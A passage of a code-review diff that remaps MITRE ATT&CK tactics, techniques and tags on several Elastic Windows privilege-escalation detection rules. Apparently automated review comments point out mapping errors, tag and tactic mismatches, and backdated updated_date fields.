"https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml index afe20aefbd0..b68b5bdb6c1 100644 
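Review bot: The rewritten threat block removes the single blank lines that separated tables and instead adds a run of three blank lines ahead of the second `[rule.threat.tactic]` and a trailing blank at end of file; the removed lines had one blank between each table, and the other rule files in this patch are not consistent with each other either. The rule formatter may normalize this on the next save, but as committed the file mixes layouts, and a reviewer reading the diff cannot tell intent from accident. Note also that this hunk keeps a `TA0005` / `Defense Evasion` entry while the tags hunk above for this file removed `"Tactic: Defense Evasion"`; one of the two must change for the new tag/tactic check to pass.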
--- a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml +++ b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/23" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] @@ -41,7 +41,16 @@ references = ["https://www.akamai.com/blog/security-research/abusing-dmsa-for-pr risk_score = 73 rule_id = "f0dbff4c-1aa7-4458-9ed5-ada472f64970" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -52,21 +61,27 @@ event.code:5137 and host.os.type:"windows" and winlog.event_data.ObjectClass:"ms [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1136.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1136/002/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] diff --git a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml index cb6d429664b..45a02549dbd 100644 --- a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml +++ b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
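Review bot: The dMSA hunk swaps T1136.002 (Create Account: Domain Account) for T1078.002 and T1098, but the query in the hunk header fires on `event.code:5137`, the directory-object-created audit event, for an `ms…` object class—so the technique that literally names the observed activity is removed while T1078.002 (use of an already valid account) is added. T1136 is valid only under Persistence in ATT&CK, so it cannot simply be appended to the new TA0004 entry; if the creation angle is still intended, keep a second `[[rule.threat]]` with `id = "T1136.002"` under `TA0003` and restore `"Tactic: Persistence"` in the tags hunk above. If dropping it is deliberate, the PR description should say so, since this changes the rule's claimed coverage rather than just its tags.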
@@ -59,7 +59,15 @@ references = [ risk_score = 47 rule_id = "5d676480-9655-4507-adc6-4eec311efff8" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -74,13 +82,14 @@ any where host.os.type == "windows" and event.category : ("library", "process") [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_driver_newterm_imphash.toml b/rules/windows/privilege_escalation_driver_newterm_imphash.toml index 8886f6ecb8e..cec1e42a855 100644 --- a/rules/windows/privilege_escalation_driver_newterm_imphash.toml +++ b/rules/windows/privilege_escalation_driver_newterm_imphash.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/19" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.osquery]] 
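Review bot: The only technique left on the DNS ServerLevelPluginDll rule is T1068 (Exploitation for Privilege Escalation), which in ATT&CK means exploiting a software vulnerability; as far as the rule name indicates, this detection is about a DLL being loaded into the DNS service through a legitimate configuration value, i.e. feature abuse rather than an exploit. The removed T1505 (Server Software Component, Persistence) arguably described that better, and the diff gives no reason for dropping the Persistence tactic altogether. Consider keeping a `TA0003` entry with `id = "T1505"` alongside the new TA0004 one and re-adding `"Tactic: Persistence"` in the tags hunk, or note in the PR why Persistence was removed. `updated_date` also moves back to `2025/03/20` despite these content changes.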
@@ -116,6 +116,36 @@ event.category:"driver" and host.os.type:windows and event.action:"load" ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["dll.pe.original_file_name", "dll.code_signature.subject_name"] diff --git a/rules/windows/privilege_escalation_expired_driver_loaded.toml b/rules/windows/privilege_escalation_expired_driver_loaded.toml index 0d8afd54d72..d96ccf10bfe 100644 --- a/rules/windows/privilege_escalation_expired_driver_loaded.toml +++ b/rules/windows/privilege_escalation_expired_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
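Review bot: The rule's `tags` list is not touched anywhere in this diff—its only other hunk is the `updated_date` line—yet the new threat block introduces both a Privilege Escalation and a Persistence tactic, so unless the existing tags already carry `"Tactic: Privilege Escalation"` and `"Tactic: Persistence"` (not visible here) the tag/tactic helper added to `tests/test_all_rules.py` in this patch will flag a missing tag. Worth confirming against the file and adding any missing `"Tactic: …"` entry in the same commit. Stylistically, the added lines put no blank between the first entry's `[rule.threat.tactic]` table and the second `[[rule.threat]]`, but three blanks before the last `[rule.threat.tactic]`; one blank per table, as the other rules use, reads better.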
@@ -21,7 +21,15 @@ references = [ risk_score = 47 rule_id = "d12bac54-ab2a-4159-933f-d7bcefa7b61d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -67,28 +75,31 @@ In Windows environments, drivers facilitate communication between the OS and har [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" -[[rule.threat.technique]] -id = "T1553" -name = "Subvert Trust Controls" -reference = "https://attack.mitre.org/techniques/T1553/" -[[rule.threat.technique.subtechnique]] -id = "T1553.002" -name = "Code Signing" -reference = "https://attack.mitre.org/techniques/T1553/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_exploit_cve_202238028.toml b/rules/windows/privilege_escalation_exploit_cve_202238028.toml index c44702fa2da..7ce5473206a 100644 --- a/rules/windows/privilege_escalation_exploit_cve_202238028.toml +++ b/rules/windows/privilege_escalation_exploit_cve_202238028.toml 
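Review bot: `updated_date` is moved back from `2026/03/23` to `2025/01/15` while this same patch rewrites the rule's tags and threat mappings; a rule whose content changes should carry a newer stamp, not an older one, and as committed the metadata says the rule predates its own mapping change (the same regression appears in every rule file in this chunk). If a later patch in the series re-stamps the dates, a sentence in the PR description would save reviewers the question. On the mapping itself, an expired-certificate driver load is the scenario T1553.002 (Subvert Trust Controls: Code Signing) describes, and that entry was removed; T1036.001 overlaps only partially, so consider keeping `id = "T1553.002"` under the TA0005 entry.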
@@ -2,7 +2,7 @@ creation_date = "2024/04/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ references = [ risk_score = 73 rule_id = "dffbd37c-d4c5-46f8-9181-5afdd9172b4c" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -89,13 +102,26 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + 
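Review bot: The new Defense Evasion entry maps a bare `T1036` (Masquerading) with no subtechnique, whereas the comparable additions elsewhere in this patch (expired-driver and phantom-DLL rules) pin `T1036.001`; if the file write this rule keys on is a masqueraded name or location, the matching subtechnique (presumably `T1036.005`) would be more precise, and if none fits, a one-line note on why the parent was chosen would help. Two added blank lines precede `[rule.threat.tactic]` inside the new block; one is enough and matches the rest of the file. `updated_date` also moves back to `2025/09/11` despite the tag and mapping changes.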
diff --git a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml index b3ba3c4fba9..83c8fad1aea 100644 --- a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml +++ b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -90,46 +90,36 @@ file where host.os.type == "windows" and event.type != "deletion" and event.acti [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" +[[rule.threat.technique.subtechnique]] +id = "T1484.001" +name = "Group Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/001/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" - -[[rule.threat.technique.subtechnique]] -id = "T1484.001" -name = "Group Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/001/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_group_policy_iniscript.toml b/rules/windows/privilege_escalation_group_policy_iniscript.toml index c3f9d5e1b2e..1c705e82d44 100644 
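Review bot: The rewritten Persistence entry drops T1543.003 (Windows Service) and keeps only T1053.005, yet the file is `privilege_escalation_gpo_schtask_service_creation` and, as far as the name and the file-event query in the hunk header indicate, it covers service creation via Group Policy as much as scheduled tasks (the query body sits outside this hunk). Unless the query itself was narrowed, the service half of the detection now has no technique at all. `T1543` is valid under both Persistence and Privilege Escalation, so keeping `id = "T1543.003"` / `name = "Windows Service"` in the TA0003 entry next to T1053.005 preserves coverage without adding a tactic or touching the tags.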
--- a/rules/windows/privilege_escalation_group_policy_iniscript.toml +++ b/rules/windows/privilege_escalation_group_policy_iniscript.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -83,7 +83,16 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" 
@@ -112,36 +121,24 @@ any where host.os.type == "windows" and event.code in ("5136", "5145") and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml index eca2ae97085..1542e312846 100644 --- a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml +++ b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
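Review bot: The Group Policy script rule now maps `T1547` (Boot or Logon Autostart Execution) and drops `T1037` (Boot or Logon Initialization Scripts); as I read ATT&CK, logon scripts assigned through AD/GPO are T1037—specifically `T1037.003` (Network Logon Script)—while T1547 covers Run keys, startup folders and similar autostart locations, so the more accurate technique appears to have been replaced by the less accurate one. T1037 is valid under both TA0003 and TA0004, so it can live in the remaining Privilege Escalation entry: restore `id = "T1037"` and consider adding the `T1037.003` subtechnique. If Persistence is intentionally no longer claimed for this rule, that is a coverage change worth a sentence in the PR description.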
@@ -85,7 +85,17 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" 
@@ -111,36 +121,41 @@ any where host.os.type == "windows" and event.code in ("5136", "5145") and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/privilege_escalation_installertakeover.toml b/rules/windows/privilege_escalation_installertakeover.toml index 6cdb156c937..52bf1177ba3 100644 --- a/rules/windows/privilege_escalation_installertakeover.toml +++ b/rules/windows/privilege_escalation_installertakeover.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.osquery]] 
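Review bot: Replacing the Execution tactic with Lateral Movement / `T1570` (Lateral Tool Transfer) is hard to square with what the hunk header shows the rule keyed on (`event.code in ("5136", "5145")`, i.e. directory-object changes and share access around a GPO scheduled-task definition): T1570 describes copying tooling between hosts, not scheduling a task through policy. `T1053.005` is valid under Execution, Persistence and Privilege Escalation, so the removed `TA0002` entry was a defensible mapping. If the Lateral Movement angle is intended (a GPO-pushed task executing on many hosts), say so in the PR; whatever is decided, `"Tactic: Lateral Movement"` in the tags hunk above must stay in step with the tactics kept here or the new tag/tactic check fails.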
@@ -143,18 +143,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique.subtechnique]] -id = "T1574.010" -name = "Services File Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/010/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml index 9091212979e..337b065f9c5 100644 --- a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml +++ b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -58,7 +58,17 @@ references = [ risk_score = 73 rule_id = "e4e31051-ee01-4307-a6ee-b21b186958f4" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] type = "eql" query = ''' 
@@ -79,31 +89,31 @@ sequence by winlog.computer_name with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1558" +name = "Steal or Forge Kerberos Tickets" +reference = "https://attack.mitre.org/techniques/T1558/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml index f843c0bda36..24dcc87b0fe 100644 --- a/rules/windows/privilege_escalation_lsa_auth_package.toml +++ b/rules/windows/privilege_escalation_lsa_auth_package.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
@@ -19,7 +19,16 @@ name = "Potential LSA Authentication Package Abuse" risk_score = 47 rule_id = "e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -70,36 +79,36 @@ The Local Security Authority (LSA) in Windows manages authentication and securit [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + 
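Review bot: The tags hunk removes `"Tactic: Persistence"`, but the threat hunk on this same line still carries two `[[rule.threat]]` entries whose tactics are `TA0004` / `Privilege Escalation` and `TA0003` / `Persistence` (they were only reordered), so `tags` and `rule.threat` now disagree and the tag/tactic helper added to `tests/test_all_rules.py` in this patch will report `Tactic: Persistence` as missing. Either keep `"Tactic: Persistence",` in the tag list or drop the TA0003 entry; since both entries map the same T1547.002 technique, dropping one loses no technique coverage, but it is a deliberate choice the PR should state. The rewritten block also leaves two added blank lines before the second `[rule.threat.tactic]`.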
diff --git a/rules/windows/privilege_escalation_make_token_local.toml b/rules/windows/privilege_escalation_make_token_local.toml index 95ae8823b78..291c41803d3 100644 --- a/rules/windows/privilege_escalation_make_token_local.toml +++ b/rules/windows/privilege_escalation_make_token_local.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/04" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -56,7 +56,14 @@ setup = """## Setup Audit event 4624 is needed to trigger this rule. """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -79,12 +86,10 @@ authentication where [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" - [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" 
@@ -95,30 +100,10 @@ id = "T1134.003" name = "Make and Impersonate Token" reference = "https://attack.mitre.org/techniques/T1134/003/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1134.003" -name = "Make and Impersonate Token" -reference = "https://attack.mitre.org/techniques/T1134/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml b/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml index 7647f482148..8302d80474b 100644 --- a/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml +++ b/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["endpoint", "sentinel_one_cloud_funnel", "m365_defender", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
